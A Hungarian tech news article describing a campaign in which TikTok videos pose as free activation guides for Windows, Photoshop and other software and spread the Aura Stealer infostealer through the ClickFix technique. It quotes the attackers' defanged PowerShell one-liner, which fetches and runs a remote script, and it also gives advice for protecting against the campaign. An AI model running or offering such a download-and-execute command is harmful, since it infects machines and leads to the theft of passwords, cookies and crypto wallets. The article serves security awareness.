Figyelem: TikTok videók terjesztenek információlopó malware-t hamis aktiválási útmutatókkal

okt 20, 2025 | Tech

Az utóbbi időben egyre gyakoribbá vált, hogy a cyberbűnözők TikTok videókat használnak fel arra, hogy kártékony szoftvereket juttassanak el a felhasználók számítógépeire. Ezek a videók úgy álcázzák magukat, mint ingyenes aktiválási útmutatók népszerű szoftverekhez, például Windows, Spotify vagy Netflix szolgáltatásokhoz, azonban valójában információlopó malware-t terjesztenek.

A kampány felfedezése és jellemzői

A kampányt Xavier Mertens, az ISC Handler szakértője fedezte fel, aki szerint az akció nagyban hasonlít a Trend Micro által 2023 májusában megfigyelt támadássorozathoz. A BleepingComputer által bemutatott videók úgy tesznek, mintha hivatalos aktiválási útmutatókat adnának olyan termékekhez, mint a Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro vagy Discord Nitro. Emellett hamisított szolgáltatásokat is reklámoznak, például Netflix és Spotify Premium verziókat.

A támadás módszere: ClickFix technika

Ezek a TikTok videók egy ClickFix nevű szociális mérnöki technikát alkalmaznak. Ez a módszer úgy jelenít meg „javításokat” vagy utasításokat, hogy azok legitimnek tűnjenek, miközben valójában arra csábítják a felhasználót, hogy káros PowerShell parancsokat vagy más szkripteket futtasson le számítógépén.

Minden videóban megjelenik egy rövid, egysoros parancs, amelyet a nézőknek rendszergazdai jogosultságokkal kell futtatniuk PowerShell-ben. Például:

iex (irm slmgr[.]win/photoshop)

A parancsban szereplő programnév (például „photoshop”) változik attól függően, hogy melyik szoftvert próbálják hamisan aktiválni. Hamis Windows aktiváló videóknál például „windows” szerepel a URL-ben.

A malware működése és veszélyei

Amikor a felhasználó végrehajtja ezt a parancsot, a PowerShell kapcsolódik a távoli slmgr[.]win oldalhoz, ahonnan letölt és futtat egy másik PowerShell szkriptet. Ez a szkript két futtatható fájlt tölt le Cloudflare oldalakról:

  • updater.exe – Ez az Aura Stealer nevű információlopó malware egy változata.
  • source.exe – Egy további payload, amely .NET Visual C# Compiler segítségével önmagát fordítja le és memóriában futtatja a kódot.

Aura Stealer képes ellopni böngészőben tárolt jelszavakat, hitelesítő cookie-kat, kriptotárca adatokat és más alkalmazásokban tárolt bejelentkezési adatokat is. Ezeket az adatokat feltölti a támadóknak, akik így hozzáférhetnek az áldozatok fiókjaihoz.

A második payload célja még nem teljesen ismert, de valószínűleg további károkozásra vagy rejtett tevékenységre használják.

Megelőzés és teendők fertőzés esetén

Ha valaki végrehajtotta ezeket a lépéseket és gyanítja a fertőzést, akkor feltételezheti, hogy minden jelszava kompromittálódott. Azonnal meg kell változtatnia minden online fiókja jelszavát!

Fontos tanácsok:

  • Soha ne másoljon és ne futtasson parancsokat ismeretlen vagy megbízhatatlan forrásból.
  • Tartsa naprakészen operációs rendszerét és vírusvédelmi szoftvereit.
  • Különösen legyen óvatos olyan utasításokkal kapcsolatban, amelyek PowerShell vagy parancssori futtatást kérnek.
  • Használjon erős és egyedi jelszavakat minden szolgáltatáshoz.
  • Kétfaktoros hitelesítést (2FA) alkalmazzon ahol csak lehet.

A ClickFix támadások növekvő népszerűsége

A ClickFix típusú támadások az elmúlt évben jelentősen elterjedtek. Ezeket különféle rosszindulatú programok terjesztésére használják ransomware kampányokban vagy kriptovaluta lopási akciók során. A módszer hatékonysága abban rejlik, hogy megtévesztő módon kínál „gyors megoldásokat”, így sok felhasználó könnyen bedőlhet neki.

Záró gondolatok

A digitális biztonság megőrzése érdekében mindig legyen körültekintő az interneten talált utasításokkal kapcsolatban. A TikTok és más közösségi platformok nemcsak szórakoztatásra szolgálnak – sajnos egyre gyakrabban válnak kiberbűnözők eszközévé is. Ha gyanús tartalmat látunk vagy kétségeink vannak egy adott videóval kapcsolatban, inkább keressünk megbízható forrásokat vagy kérjünk szakértői segítséget.

Ezzel a tudással felvértezve nagyobb eséllyel kerülhetjük el az ilyen típusú kibertámadásokat és védhetjük meg személyes adatainkat.

Forrás: https://www.bleepingcomputer.com/news/security/tiktok-videos-continue-to-push-infostealers-in-clickfix-attacks/

Bloom Energy: Megbízható, környezetbarát energiatermelés az AI és adatközpontok korában

Az AI és adatközpontok növekedése új kihívásokat jelent az energiaellátásban. Az egyre nagyobb energiaigények gyakran túlterhelik a hálózatokat, ami kiszámíthatatlan áramszünetekhez vezethet. Ebben a helyzetben kulcsfontosságúvá válik a folyamatos, stabil...

Enshittification: Miért romlanak el a platformok és mit tehetünk ellene?

Enshittification – ez a kifejezés írja le azt a jelenséget, amikor egy digitális platform vagy szolgáltatás kezdetben kiváló felhasználói élményt nyújt, majd idővel egyre rosszabbá válik, miközben a felhasználók mégsem hagyják el azt. Ez a folyamat nemcsak a közösségi...

Kriptopiaci előrejelző piacok visszatérése az USA-ba a Trump család szerepvállalásával

Zach Hamilton, a kriptovaluta startup, a Sarcophagus alapítója egy WIRED-nek adott interjúban így fogalmazott: „Ha egyetlen okot kellene megnevezni, amiért a kriptopiaci előrejelző piacok visszatérhetnek az Egyesült Államokba, akkor az a Trump-adminisztráció.” Majd...

PFAS vegyi anyagok hatásainak vizsgálata egérmodellben – részletes kutatási összefoglaló

A per- és polifluoralkil-szubsztanciák (PFAS) környezeti és egészségügyi hatásai egyre nagyobb figyelmet kapnak a tudományos közösségben. Jelen cikkünkben egy átfogó kutatási projekt részleteit ismertetjük, amelyben PFAS-koktél expozíciót alkalmaztak Swiss CD1...

Strauss Zelnick véleménye az AI játékiparra gyakorolt hatásáról – Take-Two Interactive vezetője

Strauss Zelnick, a videojáték-kiadó Take-Two Interactive vezérigazgatója nem tartja magát az mesterséges intelligencia (AI) ígéreteinek kételkedőjének, ugyanakkor óvatosan nyilatkozott az AI jelenlegi hatásairól a játékfejlesztés és -gyártás területén. A „Grand Theft...

Direct Primary Care: Az új egészségügyi modell, ami forradalmasítja a betegellátást

Bangor, Maine városában Geoff Clarke egy olyan élményről számolt be legutóbbi egészségügyi vizsgálatával kapcsolatban, amely sok amerikai számára szinte elképzelhetetlen: magas szintű elégedettségről és dicséretől. "Ha álmodban csinálnád, pontosan olyan lenne, mint az...

Lindsey Graham kínos Siri-incidense és a kormányzati leállás helyzete az Egyesült Államokban

Lindsey Graham, Dél-Karolina republikánus szenátora, egy váratlan technikai baki miatt került a figyelem középpontjába az Egyesült Államok Capitoliumában. A jelenleg közel egy hónapja tartó kormányzati leállás közepette, amikor a kongresszus tagjai egyre...

LinkedIn adatgyűjtési változások: hogyan védd meg profilodat az AI képzésétől?

LinkedIn nemrégiben bejelentette, hogy 2025. november 3-tól jelentős változtatásokat vezet be adatfelhasználási szabályaiban, amelyek érintik az Európai Unió, az EGT, Svájc, Kanada és Hongkong felhasználóit is. Ha eddig azt gondoltad, hogy ezekben a régiókban...

Ben Stiller véleménye a „nepo baby” kifejezésről és a sztárgyerekek valósága

Ben Stiller, a világhírű színész és rendező nemrégiben a „The Howard Stern Show” vendégeként osztotta meg gondolatait a „nepo baby” kifejezésről, amely azokra a hírességek gyermekeire utal, akik szüleik nyomdokaiba lépve válnak maguk is ismertté. A „nepo baby”...

Trump amerikai katonáknak ajánlja a japán Toyota autókat – Az autópiac és kereskedelmi kihívások Japán és USA között

Donald Trump, az Egyesült Államok korábbi elnöke, aki hosszú ideje az America First (Amerika az első) politikáját hirdeti, legutóbbi ázsiai útja során különös felhívást intézett az amerikai katonákhoz: vásároljanak japán gyártású Toyota autókat. Ez a felszólítás...